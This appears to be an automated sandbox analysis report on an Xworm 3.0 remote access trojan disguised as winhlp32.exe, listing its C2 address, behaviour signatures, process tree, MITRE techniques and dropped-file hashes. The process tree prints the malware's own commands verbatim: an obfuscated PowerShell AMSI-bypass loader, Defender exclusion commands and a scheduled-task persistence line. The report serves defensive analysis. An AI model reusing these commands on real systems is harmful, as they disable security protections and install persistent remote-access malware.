Analysis

  • max time kernel
    30s
  • max time network
    26s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 09:52

General

  • Target

    winhlp32.exe

  • Size

    205KB

  • MD5

    a83dc22ef14c6b5d96aaee00b10a4973

  • SHA1

    ef84a5e12797487e7a4c1acaa9f783eda6cc77d5

  • SHA256

    143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d

  • SHA512

    0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc

  • SSDEEP

    6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd

Malware Config

Extracted

Family

xworm

Version

3.0

C2

147.185.221.18:41012

Attributes
  • Install_directory

    %AppData%

  • install_file

    Agent.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{15070d3f-cde2-4f4c-b6e4-5804705bbf53}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:448
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:740
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1048
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1080
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1088
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1228
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2828
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:njewKSKxwtIq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wKbokpSPGOsdxi,[Parameter(Position=1)][Type]$FIRpOkCrBC)$BrVaUBUABXV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+'eg'+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+'e'+'','C'+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+','+'A'+'ns'+[Char](105)+''+'C'+'las'+[Char](115)+','+'A'+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$BrVaUBUABXV.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+'c'+'i'+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'de'+'B'+'yS'+[Char](105)+'g,'+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$wKbokpSPGOsdxi).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+'d'+'');$BrVaUBUABXV.DefineMethod('I'+[Char](110)+'v'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+'e'+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+'V'+'i'+''+'r'+'tua'+'l'+'',$FIRpOkCrBC,$wKbokpSPGOsdxi).SetImplementationFlags(''+'R'+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+'d');Write-Output $BrVaUBUABXV.CreateType();}$WDnKvpNzhINvk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+'c'+'ro'+[Char](115)+'o'+[Char](102)+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+'v'+''+'e'+''+[Char](77)+'et'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$ZcczOYZecLsSOF=$WDnKvpNzhINvk.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+''+[Char](100)+'re'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+'ta'+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xSYQOnOTNlMkMdDzqgH=njewKSKxwtIq @([String])([IntPtr]);$JtoMnhjFsCCWftrGSZBsJy=njewKSKxwtIq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tKaLFbhIPkJ=$WDnKvpNzhINvk.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+'d'+'le').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+'e'+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+'l'+[Char](108)+'')));$AjikdjDkyEKOSg=$ZcczOYZecLsSOF.Invoke($Null,@([Object]$tKaLFbhIPkJ,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$RVaLhRTsGdePCGtYc=$ZcczOYZecLsSOF.Invoke($Null,@([Object]$tKaLFbhIPkJ,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+'t'+'')));$sOISXEa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AjikdjDkyEKOSg,$xSYQOnOTNlMkMdDzqgH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+'.'+[Char](100)+''+'l'+'l');$MJYIIPyvTeUgwlhtg=$ZcczOYZecLsSOF.Invoke($Null,@([Object]$sOISXEa,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'uf'+[Char](102)+''+'e'+''+'r'+'')));$TwUSvUvKnc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RVaLhRTsGdePCGtYc,$JtoMnhjFsCCWftrGSZBsJy).Invoke($MJYIIPyvTeUgwlhtg,[uint32]8,4,[ref]$TwUSvUvKnc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MJYIIPyvTeUgwlhtg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RVaLhRTsGdePCGtYc,$JtoMnhjFsCCWftrGSZBsJy).Invoke($MJYIIPyvTeUgwlhtg,[uint32]8,0x20,[ref]$TwUSvUvKnc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2292
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1248
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1276
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1332
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1428
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1440
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1460
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:3012
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1468
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1604
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1632
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1696
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1744
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1804
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1852
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              1⤵
                                                PID:1948
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1968
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1980
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2020
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2084
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2220
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2272
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2308
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2440
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2452
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                1⤵
                                                                  PID:2604
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2620
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2696
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2720
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2728
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:3036
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3060
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:3076
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3332
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3424
                                                                                • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4280
                                                                                  • C:\Windows\System32\x4L.exe
                                                                                    "C:\Windows\System32\x4L.exe"
                                                                                    3⤵
                                                                                    • Checks computer location settings
                                                                                    • Drops startup file
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4976
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2300
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:3688
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4944
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:2780
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4340
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:3912
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"
                                                                                            4⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2412
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:3392
                                                                                        • C:\Windows\System32\x4Shellcode.exe
                                                                                          "C:\Windows\System32\x4Shellcode.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3916
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DCF.tmp.bat""
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2932
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            4⤵
                                                                                              PID:824
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout 3
                                                                                              4⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:2396
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3576
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3756
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3920
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4148
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2136
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4348
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:3664
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:2716
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:2104
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:3824
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                              PID:4164
                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                              1⤵
                                                                                                                PID:4352
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:4104
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:5064
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:2324
                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:4528

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                    Execution

                                                                                                                    Command and Scripting Interpreter

                                                                                                                    1
                                                                                                                    T1059

                                                                                                                    PowerShell

                                                                                                                    1
                                                                                                                    T1059.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Persistence

                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                    1
                                                                                                                    T1547

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1547.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Privilege Escalation

                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                    1
                                                                                                                    T1547

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1547.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Defense Evasion

                                                                                                                    Modify Registry

                                                                                                                    1
                                                                                                                    T1112

                                                                                                                    Discovery

                                                                                                                    Query Registry

                                                                                                                    4
                                                                                                                    T1012

                                                                                                                    System Information Discovery

                                                                                                                    4
                                                                                                                    T1082

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                      SHA1

                                                                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                      SHA256

                                                                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                      SHA512

                                                                                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                      Filesize

                                                                                                                      944B

                                                                                                                      MD5

                                                                                                                      77d622bb1a5b250869a3238b9bc1402b

                                                                                                                      SHA1

                                                                                                                      d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                      SHA256

                                                                                                                      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                      SHA512

                                                                                                                      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                      Filesize

                                                                                                                      944B

                                                                                                                      MD5

                                                                                                                      65a68df1062af34622552c4f644a5708

                                                                                                                      SHA1

                                                                                                                      6f6ecf7b4b635abb0b132d95dac2759dc14b50af

                                                                                                                      SHA256

                                                                                                                      718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

                                                                                                                      SHA512

                                                                                                                      4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp5DCF.tmp.bat
                                                                                                                      Filesize

                                                                                                                      160B

                                                                                                                      MD5

                                                                                                                      4799907eaba9b61384c6d41ac49a1f69

                                                                                                                      SHA1

                                                                                                                      3eb041560d4432e016f9aaf1cdb0972fef185095

                                                                                                                      SHA256

                                                                                                                      f1cf95c41691f5f680a7fd3d9f67cf55210ee92460d96d3e76d7d1567a700e92

                                                                                                                      SHA512

                                                                                                                      27e8729e7efa789b62aa411f880d4f2232eb8150a0c8db13e524ce5743f742f3e0deadbeec5e695db3a9937a71e9fc63aeca03e774e444c0fba87ee432bc3cea

                                                                                                                    • C:\Windows\System32\x4L.exe
                                                                                                                      Filesize

                                                                                                                      68KB

                                                                                                                      MD5

                                                                                                                      9ecdf1a7818f7e9952b6041e3aa19b7a

                                                                                                                      SHA1

                                                                                                                      93a8357036356c1c1e20a5cf69fdbad877ce8a0f

                                                                                                                      SHA256

                                                                                                                      0771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4

                                                                                                                      SHA512

                                                                                                                      847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853

                                                                                                                    • C:\Windows\System32\x4Shellcode.exe
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      MD5

                                                                                                                      8a7bee2c8cec6ac50bc42fe03d3231e6

                                                                                                                      SHA1

                                                                                                                      ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d

                                                                                                                      SHA256

                                                                                                                      c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8

                                                                                                                      SHA512

                                                                                                                      34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_431fd2ss.jyr.ps1
                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

